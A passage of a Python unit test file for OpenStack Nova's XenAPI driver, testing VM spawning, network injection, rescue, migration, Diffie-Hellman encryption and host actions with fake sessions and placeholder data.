            self.assert_(not name_label.endswith('snapshot'))

    def create_vm_record(self, conn, os_type, name):
        instances = conn.list_instances()
        self.assertEquals(instances, [name])

        # Get Nova record for VM
        vm_info = conn.get_info({'name': name})
        # Get XenAPI record for VM
        vms = [rec for ref, rec
               in xenapi_fake.get_all_records('VM').iteritems()
               if not rec['is_control_domain']]
        vm = vms[0]
        self.vm_info = vm_info
        self.vm = vm

    def check_vm_record(self, conn, check_injection=False):
        # Check that m1.large above turned into the right thing.
        instance_type = db.instance_type_get_by_name(conn, 'm1.large')
        mem_kib = long(instance_type['memory_mb']) << 10
        mem_bytes = str(mem_kib << 10)
        vcpus = instance_type['vcpus']
        self.assertEquals(self.vm_info['max_mem'], mem_kib)
        self.assertEquals(self.vm_info['mem'], mem_kib)
        self.assertEquals(self.vm['memory_static_max'], mem_bytes)
        self.assertEquals(self.vm['memory_dynamic_max'], mem_bytes)
        self.assertEquals(self.vm['memory_dynamic_min'], mem_bytes)
        self.assertEquals(self.vm['VCPUs_max'], str(vcpus))
        self.assertEquals(self.vm['VCPUs_at_startup'], str(vcpus))

        # Check that the VM is running according to Nova
        self.assertEquals(self.vm_info['state'], power_state.RUNNING)

        # Check that the VM is running according to XenAPI.
        self.assertEquals(self.vm['power_state'], 'Running')

        if check_injection:
            xenstore_data = self.vm['xenstore_data']
            self.assertEquals(xenstore_data['vm-data/hostname'], 'test')
            key = 'vm-data/networking/DEADBEEF0000'
            xenstore_value = xenstore_data[key]
            tcpip_data = ast.literal_eval(xenstore_value)
            self.assertEquals(tcpip_data,
                              {'broadcast': '192.168.0.255',
                               'dns': ['192.168.0.1'],
                               'gateway': '192.168.0.1',
                               'gateway_v6': 'dead:beef::1',
                               'ip6s': [{'enabled': '1',
                                         'ip': 'dead:beef::dcad:beff:feef:0',
                                               'netmask': '64'}],
                               'ips': [{'enabled': '1',
                                        'ip': '192.168.0.100',
                                        'netmask': '255.255.255.0'}],
                               'dhcp_server': '192.168.0.1',
                               'label': 'fake',
                               'mac': 'DE:AD:BE:EF:00:00',
                               'rxtx_cap': 3})

    def check_vm_params_for_windows(self):
        self.assertEquals(self.vm['platform']['nx'], 'true')
        self.assertEquals(self.vm['HVM_boot_params'], {'order': 'dc'})
        self.assertEquals(self.vm['HVM_boot_policy'], 'BIOS order')

        # check that these are not set
        self.assertEquals(self.vm['PV_args'], '')
        self.assertEquals(self.vm['PV_bootloader'], '')
        self.assertEquals(self.vm['PV_kernel'], '')
        self.assertEquals(self.vm['PV_ramdisk'], '')

    def check_vm_params_for_linux(self):
        self.assertEquals(self.vm['platform']['nx'], 'false')
        self.assertEquals(self.vm['PV_args'], '')
        self.assertEquals(self.vm['PV_bootloader'], 'pygrub')

        # check that these are not set
        self.assertEquals(self.vm['PV_kernel'], '')
        self.assertEquals(self.vm['PV_ramdisk'], '')
        self.assertEquals(self.vm['HVM_boot_params'], {})
        self.assertEquals(self.vm['HVM_boot_policy'], '')

    def check_vm_params_for_linux_with_external_kernel(self):
        self.assertEquals(self.vm['platform']['nx'], 'false')
        self.assertEquals(self.vm['PV_args'], 'root=/dev/xvda1')
        self.assertNotEquals(self.vm['PV_kernel'], '')
        self.assertNotEquals(self.vm['PV_ramdisk'], '')

        # check that these are not set
        self.assertEquals(self.vm['HVM_boot_params'], {})
        self.assertEquals(self.vm['HVM_boot_policy'], '')

    def _list_vdis(self):
        url = FLAGS.xenapi_connection_url
        username = FLAGS.xenapi_connection_username
        password = FLAGS.xenapi_connection_password
        session = xenapi_conn.XenAPISession(url, username, password)
        return session.call_xenapi('VDI.get_all')

    def _check_vdis(self, start_list, end_list):
        for vdi_ref in end_list:
            if not vdi_ref in start_list:
                vdi_rec = xenapi_fake.get_record('VDI', vdi_ref)
                # If the cache is turned on then the base disk will be
                # there even after the cleanup
                if 'other_config' in vdi_rec:
                    if vdi_rec['other_config']['image-id'] is None:
                        self.fail('Found unexpected VDI:%s' % vdi_ref)
                else:
                    self.fail('Found unexpected VDI:%s' % vdi_ref)

    def _test_spawn(self, image_ref, kernel_id, ramdisk_id,
                    instance_type_id="3", os_type="linux",
                    hostname="test", architecture="x86-64", instance_id=1,
                    check_injection=False,
                    create_record=True, empty_dns=False):
        if create_record:
            instance_values = {'id': instance_id,
                      'project_id': self.project_id,
                      'user_id': self.user_id,
                      'image_ref': image_ref,
                      'kernel_id': kernel_id,
                      'ramdisk_id': ramdisk_id,
                      'root_gb': 20,
                      'instance_type_id': instance_type_id,
                      'os_type': os_type,
                      'hostname': hostname,
                      'architecture': architecture}
            instance = db.instance_create(self.context, instance_values)
        else:
            instance = db.instance_get(self.context, instance_id)
        network_info = [({'bridge': 'fa0', 'id': 0,
                          'injected': True,
                          'cidr': '192.168.0.0/24',
                          'cidr_v6': 'dead:beef::1/120',
                          },
                          {'broadcast': '192.168.0.255',
                           'dns': ['192.168.0.1'],
                           'gateway': '192.168.0.1',
                           'gateway_v6': 'dead:beef::1',
                           'ip6s': [{'enabled': '1',
                                     'ip': 'dead:beef::dcad:beff:feef:0',
                                           'netmask': '64'}],
                           'ips': [{'enabled': '1',
                                    'ip': '192.168.0.100',
                                    'netmask': '255.255.255.0'}],
                           'dhcp_server': '192.168.0.1',
                           'label': 'fake',
                           'mac': 'DE:AD:BE:EF:00:00',
                           'rxtx_cap': 3})]
        if empty_dns:
            network_info[0][1]['dns'] = []

        # admin_pass isn't part of the DB model, but it does get set as
        # an attribute for spawn to use
        instance.admin_pass = 'herp'
        image_meta = {'id': glance_stubs.FakeGlance.IMAGE_VHD,
                      'disk_format': 'vhd'}
        self.conn.spawn(self.context, instance, image_meta, network_info)
        self.create_vm_record(self.conn, os_type, instance['name'])
        self.check_vm_record(self.conn, check_injection)
        self.assertTrue(instance.os_type)
        self.assertTrue(instance.architecture)

    def test_spawn_empty_dns(self):
        """Test spawning with an empty dns list"""
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_VHD, None, None,
                         os_type="linux", architecture="x86-64",
                         empty_dns=True)
        self.check_vm_params_for_linux()

    def test_spawn_not_enough_memory(self):
        self.assertRaises(exception.InsufficientFreeMemory,
                          self._test_spawn,
                          1, 2, 3, "4")  # m1.xlarge

    def test_spawn_fail_cleanup_1(self):
        """Simulates an error while downloading an image.

        Verifies that VDIs created are properly cleaned up.

        """
        vdi_recs_start = self._list_vdis()
        stubs.stubout_fetch_image_glance_disk(self.stubs, raise_failure=True)
        self.assertRaises(xenapi_fake.Failure,
                          self._test_spawn, 1, 2, 3)
        # No additional VDI should be found.
        vdi_recs_end = self._list_vdis()
        self._check_vdis(vdi_recs_start, vdi_recs_end)

    def test_spawn_fail_cleanup_2(self):
        """Simulates an error while creating VM record.

        It verifies that VDIs created are properly cleaned up.

        """
        vdi_recs_start = self._list_vdis()
        stubs.stubout_create_vm(self.stubs)
        self.assertRaises(xenapi_fake.Failure,
                          self._test_spawn, 1, 2, 3)
        # No additional VDI should be found.
        vdi_recs_end = self._list_vdis()
        self._check_vdis(vdi_recs_start, vdi_recs_end)

    @stub_vm_utils_with_vdi_attached_here
    def test_spawn_raw_glance(self):
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_RAW, None, None)
        self.check_vm_params_for_linux()

    def test_spawn_vhd_glance_linux(self):
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_VHD, None, None,
                         os_type="linux", architecture="x86-64")
        self.check_vm_params_for_linux()

    def test_spawn_vhd_glance_swapdisk(self):
        # Change the default host_call_plugin to one that'll return
        # a swap disk
        orig_func = stubs.FakeSessionForVMTests.host_call_plugin
        _host_call_plugin = stubs.FakeSessionForVMTests.host_call_plugin_swap
        stubs.FakeSessionForVMTests.host_call_plugin = _host_call_plugin
        # Stubbing out firewall driver as previous stub sets a particular
        # stub for async plugin calls
        stubs.stubout_firewall_driver(self.stubs, self.conn)
        try:
            # We'll steal the above glance linux test
            self.test_spawn_vhd_glance_linux()
        finally:
            # Make sure to put this back
            stubs.FakeSessionForVMTests.host_call_plugin = orig_func

        # We should have 2 VBDs.
        self.assertEqual(len(self.vm['VBDs']), 2)
        # Now test that we have 1.
        self.tearDown()
        self.setUp()
        self.test_spawn_vhd_glance_linux()
        self.assertEqual(len(self.vm['VBDs']), 1)

    def test_spawn_vhd_glance_windows(self):
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_VHD, None, None,
                         os_type="windows", architecture="i386")
        self.check_vm_params_for_windows()

    def test_spawn_iso_glance(self):
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_ISO, None, None,
                         os_type="windows", architecture="i386")
        self.check_vm_params_for_windows()

    def test_spawn_glance(self):
        stubs.stubout_fetch_image_glance_disk(self.stubs)
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_MACHINE,
                         glance_stubs.FakeGlance.IMAGE_KERNEL,
                         glance_stubs.FakeGlance.IMAGE_RAMDISK)
        self.check_vm_params_for_linux_with_external_kernel()

    def test_spawn_netinject_file(self):
        self.flags(flat_injected=True)
        db_fakes.stub_out_db_instance_api(self.stubs, injected=True)

        self._tee_executed = False

        def _tee_handler(cmd, **kwargs):
            input = kwargs.get('process_input', None)
            self.assertNotEqual(input, None)
            config = [line.strip() for line in input.split("\n")]
            # Find the start of eth0 configuration and check it
            index = config.index('auto eth0')
            self.assertEquals(config[index + 1:index + 8], [
                'iface eth0 inet static',
                'address 192.168.0.100',
                'netmask 255.255.255.0',
                'broadcast 192.168.0.255',
                'gateway 192.168.0.1',
                'dns-nameservers 192.168.0.1',
                ''])
            self._tee_executed = True
            return '', ''

        fake_utils.fake_execute_set_repliers([
            # Capture the tee .../etc/network/interfaces command
            (r'tee.*interfaces', _tee_handler),
        ])
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_MACHINE,
                         glance_stubs.FakeGlance.IMAGE_KERNEL,
                         glance_stubs.FakeGlance.IMAGE_RAMDISK,
                         check_injection=True)
        self.assertTrue(self._tee_executed)

    def test_spawn_netinject_xenstore(self):
        db_fakes.stub_out_db_instance_api(self.stubs, injected=True)

        self._tee_executed = False

        def _mount_handler(cmd, *ignore_args, **ignore_kwargs):
            # When mounting, create real files under the mountpoint to simulate
            # files in the mounted filesystem

            # mount point will be the last item of the command list
            self._tmpdir = cmd[len(cmd) - 1]
            LOG.debug(_('Creating files in %s to simulate guest agent'),
                      self._tmpdir)
            os.makedirs(os.path.join(self._tmpdir, 'usr', 'sbin'))
            # Touch the file using open
            open(os.path.join(self._tmpdir, 'usr', 'sbin',
                'xe-update-networking'), 'w').close()
            return '', ''

        def _umount_handler(cmd, *ignore_args, **ignore_kwargs):
            # Umount would normall make files in the m,ounted filesystem
            # disappear, so do that here
            LOG.debug(_('Removing simulated guest agent files in %s'),
                      self._tmpdir)
            os.remove(os.path.join(self._tmpdir, 'usr', 'sbin',
                'xe-update-networking'))
            os.rmdir(os.path.join(self._tmpdir, 'usr', 'sbin'))
            os.rmdir(os.path.join(self._tmpdir, 'usr'))
            return '', ''

        def _tee_handler(cmd, *ignore_args, **ignore_kwargs):
            self._tee_executed = True
            return '', ''

        fake_utils.fake_execute_set_repliers([
            (r'mount', _mount_handler),
            (r'umount', _umount_handler),
            (r'tee.*interfaces', _tee_handler)])
        self._test_spawn(1, 2, 3, check_injection=True)

        # tee must not run in this case, where an injection-capable
        # guest agent is detected
        self.assertFalse(self._tee_executed)

    def test_spawn_vlanmanager(self):
        self.flags(image_service='nova.image.glance.GlanceImageService',
                   network_manager='nova.network.manager.VlanManager',
                   vlan_interface='fake0')

        def dummy(*args, **kwargs):
            pass

        self.stubs.Set(vmops.VMOps, '_create_vifs', dummy)
        # Reset network table
        xenapi_fake.reset_table('network')
        # Instance id = 2 will use vlan network (see db/fakes.py)
        ctxt = self.context.elevated()
        instance = self._create_instance(2, False)
        networks = self.network.db.network_get_all(ctxt)
        for network in networks:
            self.network.set_network_host(ctxt, network)

        self.network.allocate_for_instance(ctxt,
                          instance_id=2,
                          instance_uuid="00000000-0000-0000-0000-000000000000",
                          host=FLAGS.host,
                          vpn=None,
                          rxtx_factor=3,
                          project_id=self.project_id)
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_MACHINE,
                         glance_stubs.FakeGlance.IMAGE_KERNEL,
                         glance_stubs.FakeGlance.IMAGE_RAMDISK,
                         instance_id=2,
                         create_record=False)
        # TODO(salvatore-orlando): a complete test here would require
        # a check for making sure the bridge for the VM's VIF is
        # consistent with bridge specified in nova db

    def test_spawn_with_network_qos(self):
        self._create_instance()
        for vif_ref in xenapi_fake.get_all('VIF'):
            vif_rec = xenapi_fake.get_record('VIF', vif_ref)
            self.assertEquals(vif_rec['qos_algorithm_type'], 'ratelimit')
            self.assertEquals(vif_rec['qos_algorithm_params']['kbps'],
                              str(3 * 1024))

    def test_rescue(self):
        instance = self._create_instance()
        session = xenapi_conn.XenAPISession('test_url', 'root', 'test_pass')
        vm = vm_utils.VMHelper.lookup(session, instance.name)
        vbd = xenapi_fake.create_vbd(vm, None)
        conn = xenapi_conn.get_connection(False)
        image_meta = {'id': glance_stubs.FakeGlance.IMAGE_VHD,
                      'disk_format': 'vhd'}
        conn.rescue(self.context, instance, [], image_meta)

    def test_unrescue(self):
        instance = self._create_instance()
        conn = xenapi_conn.get_connection(False)
        # Unrescue expects the original instance to be powered off
        conn.power_off(instance)
        rescue_vm = xenapi_fake.create_vm(instance.name + '-rescue', 'Running')
        conn.unrescue(instance, None)

    def test_unrescue_not_in_rescue(self):
        instance = self._create_instance()
        conn = xenapi_conn.get_connection(False)
        # Ensure that it will not unrescue a non-rescued instance.
        self.assertRaises(exception.InstanceNotInRescueMode, conn.unrescue,
                          instance, None)

    def test_finish_revert_migration(self):
        instance = self._create_instance()

        class VMOpsMock():

            def __init__(self):
                self.finish_revert_migration_called = False

            def finish_revert_migration(self, instance):
                self.finish_revert_migration_called = True

        conn = xenapi_conn.get_connection(False)
        conn._vmops = VMOpsMock()
        conn.finish_revert_migration(instance, None)
        self.assertTrue(conn._vmops.finish_revert_migration_called)

    def _create_instance(self, instance_id=1, spawn=True):
        """Creates and spawns a test instance."""
        instance_values = {
            'id': instance_id,
            'project_id': self.project_id,
            'user_id': self.user_id,
            'image_ref': 1,
            'kernel_id': 2,
            'ramdisk_id': 3,
            'root_gb': 20,
            'instance_type_id': '3',  # m1.large
            'os_type': 'linux',
            'architecture': 'x86-64'}
        instance = db.instance_create(self.context, instance_values)
        network_info = [({'bridge': 'fa0', 'id': 0,
                          'injected': False,
                          'cidr': '192.168.0.0/24',
                          'cidr_v6': 'dead:beef::1/120',
                          },
                          {'broadcast': '192.168.0.255',
                           'dns': ['192.168.0.1'],
                           'gateway': '192.168.0.1',
                           'gateway_v6': 'dead:beef::1',
                           'ip6s': [{'enabled': '1',
                                     'ip': 'dead:beef::dcad:beff:feef:0',
                                           'netmask': '64'}],
                           'ips': [{'enabled': '1',
                                    'ip': '192.168.0.100',
                                    'netmask': '255.255.255.0'}],
                           'dhcp_server': '192.168.0.1',
                           'label': 'fake',
                           'mac': 'DE:AD:BE:EF:00:00',
                           'rxtx_cap': 3})]
        image_meta = {'id': glance_stubs.FakeGlance.IMAGE_VHD,
                      'disk_format': 'vhd'}
        if spawn:
            instance.admin_pass = 'herp'
            self.conn.spawn(self.context, instance, image_meta, network_info)
        return instance


class XenAPIDiffieHellmanTestCase(test.TestCase):
    """Unit tests for Diffie-Hellman code."""
    def setUp(self):
        super(XenAPIDiffieHellmanTestCase, self).setUp()
        self.alice = vmops.SimpleDH()
        self.bob = vmops.SimpleDH()

    def test_shared(self):
        alice_pub = self.alice.get_public()
        bob_pub = self.bob.get_public()
        alice_shared = self.alice.compute_shared(bob_pub)
        bob_shared = self.bob.compute_shared(alice_pub)
        self.assertEquals(alice_shared, bob_shared)

    def _test_encryption(self, message):
        enc = self.alice.encrypt(message)
        self.assertFalse(enc.endswith('\n'))
        dec = self.bob.decrypt(enc)
        self.assertEquals(dec, message)

    def test_encrypt_simple_message(self):
        self._test_encryption('This is a simple message.')

    def test_encrypt_message_with_newlines_at_end(self):
        self._test_encryption('This message has a newline at the end.\n')

    def test_encrypt_many_newlines_at_end(self):
        self._test_encryption('Message with lotsa newlines.\n\n\n')

    def test_encrypt_newlines_inside_message(self):
        self._test_encryption('Message\nwith\ninterior\nnewlines.')

    def test_encrypt_with_leading_newlines(self):
        self._test_encryption('\n\nMessage with leading newlines.')

    def test_encrypt_really_long_message(self):
        self._test_encryption(''.join(['abcd' for i in xrange(1024)]))


class XenAPIMigrateInstance(test.TestCase):
    """Unit test for verifying migration-related actions."""

    def setUp(self):
        super(XenAPIMigrateInstance, self).setUp()
        self.flags(target_host='127.0.0.1',
                xenapi_connection_url='test_url',
                xenapi_connection_password='test_pass',
                firewall_driver='nova.virt.xenapi.firewall.'
                                'Dom0IptablesFirewallDriver')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        db_fakes.stub_out_db_instance_api(self.stubs)
        xenapi_fake.reset()
        xenapi_fake.create_network('fake', FLAGS.flat_network_bridge)
        self.user_id = 'fake'
        self.project_id = 'fake'
        self.context = context.RequestContext(self.user_id, self.project_id)
        self.instance_values = {'id': 1,
                  'project_id': self.project_id,
                  'user_id': self.user_id,
                  'image_ref': 1,
                  'kernel_id': None,
                  'ramdisk_id': None,
                  'root_gb': 5,
                  'instance_type_id': '3',  # m1.large
                  'os_type': 'linux',
                  'architecture': 'x86-64'}

        migration_values = {
            'source_compute': 'nova-compute',
            'dest_compute': 'nova-compute',
            'dest_host': '10.127.5.114',
            'status': 'post-migrating',
            'instance_uuid': '15f23e6a-cc6e-4d22-b651-d9bdaac316f7',
            'old_instance_type_id': 5,
            'new_instance_type_id': 1
        }
        self.migration = db.migration_create(
            context.get_admin_context(), migration_values)

        fake_utils.stub_out_utils_execute(self.stubs)
        stubs.stub_out_migration_methods(self.stubs)
        stubs.stubout_get_this_vm_uuid(self.stubs)
        glance_stubs.stubout_glance_client(self.stubs)

    def test_resize_xenserver_6(self):
        instance = db.instance_create(self.context, self.instance_values)
        called = {'resize': False}

        def fake_vdi_resize(*args, **kwargs):
            called['resize'] = True

        self.stubs.Set(stubs.FakeSessionForVMTests,
                       "VDI_resize", fake_vdi_resize)
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests,
                              product_version=(6, 0, 0))
        conn = xenapi_conn.get_connection(False)
        vdi_ref = xenapi_fake.create_vdi('hurr', 'fake')
        vdi_uuid = xenapi_fake.get_record('VDI', vdi_ref)['uuid']
        conn._vmops._resize_instance(instance, vdi_uuid)
        self.assertEqual(called['resize'], True)

    def test_migrate_disk_and_power_off(self):
        instance = db.instance_create(self.context, self.instance_values)
        xenapi_fake.create_vm(instance.name, 'Running')
        instance_type = db.instance_type_get_by_name(self.context, 'm1.large')
        conn = xenapi_conn.get_connection(False)
        conn.migrate_disk_and_power_off(self.context, instance,
                                        '127.0.0.1', instance_type, None)

    def test_migrate_disk_and_power_off_passes_exceptions(self):
        instance = db.instance_create(self.context, self.instance_values)
        xenapi_fake.create_vm(instance.name, 'Running')
        instance_type = db.instance_type_get_by_name(self.context, 'm1.large')

        def fake_raise(*args, **kwargs):
            raise exception.MigrationError(reason='test failure')
        self.stubs.Set(vmops.VMOps, "_migrate_vhd", fake_raise)

        conn = xenapi_conn.get_connection(False)
        self.assertRaises(exception.MigrationError,
                          conn.migrate_disk_and_power_off,
                          self.context, instance,
                          '127.0.0.1', instance_type, None)

    def test_revert_migrate(self):
        instance = db.instance_create(self.context, self.instance_values)
        self.called = False
        self.fake_vm_start_called = False
        self.fake_finish_revert_migration_called = False

        def fake_vm_start(*args, **kwargs):
            self.fake_vm_start_called = True

        def fake_vdi_resize(*args, **kwargs):
            self.called = True

        def fake_finish_revert_migration(*args, **kwargs):
            self.fake_finish_revert_migration_called = True

        self.stubs.Set(stubs.FakeSessionForVMTests,
                       "VDI_resize_online", fake_vdi_resize)
        self.stubs.Set(vmops.VMOps, '_start', fake_vm_start)
        self.stubs.Set(vmops.VMOps, 'finish_revert_migration',
                       fake_finish_revert_migration)

        conn = xenapi_conn.get_connection(False)
        network_info = [({'bridge': 'fa0', 'id': 0, 'injected': False},
                          {'broadcast': '192.168.0.255',
                           'dns': ['192.168.0.1'],
                           'gateway': '192.168.0.1',
                           'gateway_v6': 'dead:beef::1',
                           'ip6s': [{'enabled': '1',
                                     'ip': 'dead:beef::dcad:beff:feef:0',
                                     'netmask': '64'}],
                           'ips': [{'enabled': '1',
                                    'ip': '192.168.0.100',
                                    'netmask': '255.255.255.0'}],
                           'label': 'fake',
                           'mac': 'DE:AD:BE:EF:00:00',
                           'rxtx_cap': 3})]
        image_meta = {'id': instance.image_ref, 'disk_format': 'vhd'}
        base = xenapi_fake.create_vdi('hurr', 'fake')
        base_uuid = xenapi_fake.get_record('VDI', base)['uuid']
        cow = xenapi_fake.create_vdi('durr', 'fake')
        cow_uuid = xenapi_fake.get_record('VDI', cow)['uuid']
        conn.finish_migration(self.context, self.migration, instance,
                              dict(base_copy=base_uuid, cow=cow_uuid),
                              network_info, image_meta, resize_instance=True)
        self.assertEqual(self.called, True)
        self.assertEqual(self.fake_vm_start_called, True)

        conn.finish_revert_migration(instance, network_info)
        self.assertEqual(self.fake_finish_revert_migration_called, True)

    def test_finish_migrate(self):
        instance = db.instance_create(self.context, self.instance_values)
        self.called = False
        self.fake_vm_start_called = False

        def fake_vm_start(*args, **kwargs):
            self.fake_vm_start_called = True

        def fake_vdi_resize(*args, **kwargs):
            self.called = True

        self.stubs.Set(vmops.VMOps, '_start', fake_vm_start)
        self.stubs.Set(stubs.FakeSessionForVMTests,
                       "VDI_resize_online", fake_vdi_resize)

        conn = xenapi_conn.get_connection(False)
        network_info = [({'bridge': 'fa0', 'id': 0, 'injected': False},
                          {'broadcast': '192.168.0.255',
                           'dns': ['192.168.0.1'],
                           'gateway': '192.168.0.1',
                           'gateway_v6': 'dead:beef::1',
                           'ip6s': [{'enabled': '1',
                                     'ip': 'dead:beef::dcad:beff:feef:0',
                                           'netmask': '64'}],
                           'ips': [{'enabled': '1',
                                    'ip': '192.168.0.100',
                                    'netmask': '255.255.255.0'}],
                           'label': 'fake',
                           'mac': 'DE:AD:BE:EF:00:00',
                           'rxtx_cap': 3})]
        image_meta = {'id': instance.image_ref, 'disk_format': 'vhd'}
        conn.finish_migration(self.context, self.migration, instance,
                              dict(base_copy='hurr', cow='durr'),
                              network_info, image_meta, resize_instance=True)
        self.assertEqual(self.called, True)
        self.assertEqual(self.fake_vm_start_called, True)

    def test_finish_migrate_no_local_storage(self):
        tiny_type = instance_types.get_instance_type_by_name('m1.tiny')
        tiny_type_id = tiny_type['id']
        self.instance_values.update({'instance_type_id': tiny_type_id,
                                     'root_gb': 0})
        instance = db.instance_create(self.context, self.instance_values)

        def fake_vdi_resize(*args, **kwargs):
            raise Exception("This shouldn't be called")

        self.stubs.Set(stubs.FakeSessionForVMTests,
                       "VDI_resize_online", fake_vdi_resize)
        conn = xenapi_conn.get_connection(False)
        network_info = [({'bridge': 'fa0', 'id': 0, 'injected': False},
                          {'broadcast': '192.168.0.255',
                           'dns': ['192.168.0.1'],
                           'gateway': '192.168.0.1',
                           'gateway_v6': 'dead:beef::1',
                           'ip6s': [{'enabled': '1',
                                     'ip': 'dead:beef::dcad:beff:feef:0',
                                           'netmask': '64'}],
                           'ips': [{'enabled': '1',
                                    'ip': '192.168.0.100',
                                    'netmask': '255.255.255.0'}],
                           'label': 'fake',
                           'mac': 'DE:AD:BE:EF:00:00',
                           'rxtx_cap': 3})]
        image_meta = {'id': instance.image_ref, 'disk_format': 'vhd'}
        conn.finish_migration(self.context, self.migration, instance,
                              dict(base_copy='hurr', cow='durr'),
                              network_info, image_meta, resize_instance=True)

    def test_finish_migrate_no_resize_vdi(self):
        instance = db.instance_create(self.context, self.instance_values)

        def fake_vdi_resize(*args, **kwargs):
            raise Exception("This shouldn't be called")

        self.stubs.Set(stubs.FakeSessionForVMTests,
                       "VDI_resize_online", fake_vdi_resize)
        conn = xenapi_conn.get_connection(False)
        network_info = [({'bridge': 'fa0', 'id': 0, 'injected': False},
                          {'broadcast': '192.168.0.255',
                           'dns': ['192.168.0.1'],
                           'gateway': '192.168.0.1',
                           'gateway_v6': 'dead:beef::1',
                           'ip6s': [{'enabled': '1',
                                     'ip': 'dead:beef::dcad:beff:feef:0',
                                           'netmask': '64'}],
                           'ips': [{'enabled': '1',
                                    'ip': '192.168.0.100',
                                    'netmask': '255.255.255.0'}],
                           'label': 'fake',
                           'mac': 'DE:AD:BE:EF:00:00',
                           'rxtx_cap': 3})]

        # Resize instance would be determined by the compute call
        image_meta = {'id': instance.image_ref, 'disk_format': 'vhd'}
        conn.finish_migration(self.context, self.migration, instance,
                              dict(base_copy='hurr', cow='durr'),
                              network_info, image_meta, resize_instance=False)


class XenAPIImageTypeTestCase(test.TestCase):
    """Test ImageType class."""

    def test_to_string(self):
        """Can convert from type id to type string."""
        self.assertEquals(
            vm_utils.ImageType.to_string(vm_utils.ImageType.KERNEL),
            vm_utils.ImageType.KERNEL_STR)

    def test_from_string(self):
        """Can convert from string to type id."""
        self.assertEquals(
            vm_utils.ImageType.from_string(vm_utils.ImageType.KERNEL_STR),
            vm_utils.ImageType.KERNEL)


class XenAPIDetermineDiskImageTestCase(test.TestCase):
    """Unit tests for code that detects the ImageType."""
    def setUp(self):
        super(XenAPIDetermineDiskImageTestCase, self).setUp()
        glance_stubs.stubout_glance_client(self.stubs)

        class FakeInstance(object):
            pass

        self.fake_instance = FakeInstance()
        self.fake_instance.id = 42
        self.fake_instance.os_type = 'linux'
        self.fake_instance.architecture = 'x86-64'

    def assert_disk_type(self, image_meta, expected_disk_type):
        actual = vm_utils.VMHelper.determine_disk_image_type(image_meta)
        self.assertEqual(expected_disk_type, actual)

    def test_machine(self):
        image_meta = {'id': 'a', 'disk_format': 'ami'}
        self.assert_disk_type(image_meta, vm_utils.ImageType.DISK)

    def test_raw(self):
        image_meta = {'id': 'a', 'disk_format': 'raw'}
        self.assert_disk_type(image_meta, vm_utils.ImageType.DISK_RAW)

    def test_vhd(self):
        image_meta = {'id': 'a', 'disk_format': 'vhd'}
        self.assert_disk_type(image_meta, vm_utils.ImageType.DISK_VHD)


class CompareVersionTestCase(test.TestCase):
    def test_less_than(self):
        """Test that cmp_version compares a as less than b"""
        self.assertTrue(vmops.cmp_version('1.2.3.4', '1.2.3.5') < 0)

    def test_greater_than(self):
        """Test that cmp_version compares a as greater than b"""
        self.assertTrue(vmops.cmp_version('1.2.3.5', '1.2.3.4') > 0)

    def test_equal(self):
        """Test that cmp_version compares a as equal to b"""
        self.assertTrue(vmops.cmp_version('1.2.3.4', '1.2.3.4') == 0)

    def test_non_lexical(self):
        """Test that cmp_version compares non-lexically"""
        self.assertTrue(vmops.cmp_version('1.2.3.10', '1.2.3.4') > 0)

    def test_length(self):
        """Test that cmp_version compares by length as last resort"""
        self.assertTrue(vmops.cmp_version('1.2.3', '1.2.3.4') < 0)


class XenAPIHostTestCase(test.TestCase):
    """Tests HostState, which holds metrics from XenServer that get
    reported back to the Schedulers."""

    def setUp(self):
        super(XenAPIHostTestCase, self).setUp()
        self.flags(xenapi_connection_url='test_url',
                   xenapi_connection_password='test_pass')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        xenapi_fake.reset()
        xenapi_fake.create_local_srs()
        self.conn = xenapi_conn.get_connection(False)

    def test_host_state(self):
        stats = self.conn.get_host_stats()
        self.assertEquals(stats['disk_total'], 10000)
        self.assertEquals(stats['disk_used'], 20000)
        self.assertEquals(stats['host_memory_total'], 10)
        self.assertEquals(stats['host_memory_overhead'], 20)
        self.assertEquals(stats['host_memory_free'], 30)
        self.assertEquals(stats['host_memory_free_computed'], 40)

    def _test_host_action(self, method, action, expected=None):
        result = method('host', action)
        if not expected:
            expected = action
        self.assertEqual(result, expected)

    def test_host_reboot(self):
        self._test_host_action(self.conn.host_power_action, 'reboot')

    def test_host_shutdown(self):
        self._test_host_action(self.conn.host_power_action, 'shutdown')

    def test_host_startup(self):
        self.assertRaises(NotImplementedError,
                          self.conn.host_power_action, 'host', 'startup')

    def test_host_maintenance_on(self):
        self._test_host_action(self.conn.host_maintenance_mode,
                               True, 'on_maintenance')

    def test_host_maintenance_off(self):
        self._test_host_action(self.conn.host_maintenance_mode,
                               False, 'off_maintenance')

    def test_set_enable_host_enable(self):
        self._test_host_action(self.conn.set_host_enabled, True, 'enabled')

    def test_set_enable_host_disable(self):
        self._test_host_action(self.conn.set_host_enabled, False, 'disabled')


class XenAPIAutoDiskConfigTestCase(test.TestCase):
    def setUp(self):
        super(XenAPIAutoDiskConfigTestCase, self).setUp()
        self.flags(target_host='127.0.0.1',
                   xenapi_connection_url='test_url',
                   xenapi_connection_password='test_pass',
                   firewall_driver='nova.virt.xenapi.firewall.'
                                   'Dom0IptablesFirewallDriver')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        xenapi_fake.reset()
        self.conn = xenapi_conn.get_connection(False)

        self.user_id = 'fake'
        self.project_id = 'fake'

        self.instance_values = {'id': 1,
                  'project_id': self.project_id,
                  'user_id': self.user_id,
                  'image_ref': 1,
                  'kernel_id': 2,
                  'ramdisk_id': 3,
                  'root_gb': 20,
                  'instance_type_id': '3',  # m1.large
                  'os_type': 'linux',
                  'architecture': 'x86-64'}

        self.context = context.RequestContext(self.user_id, self.project_id)

        @classmethod
        def fake_create_vbd(cls, session, vm_ref, vdi_ref, userdevice,
                            vbd_type='disk', read_only=False, bootable=True):
            pass

        self.stubs.Set(vm_utils.VMHelper,
                       "create_vbd",
                       fake_create_vbd)

    def assertIsPartitionCalled(self, called):
        marker = {"partition_called": False}

        def fake_resize_part_and_fs(dev, start, old, new):
            marker["partition_called"] = True
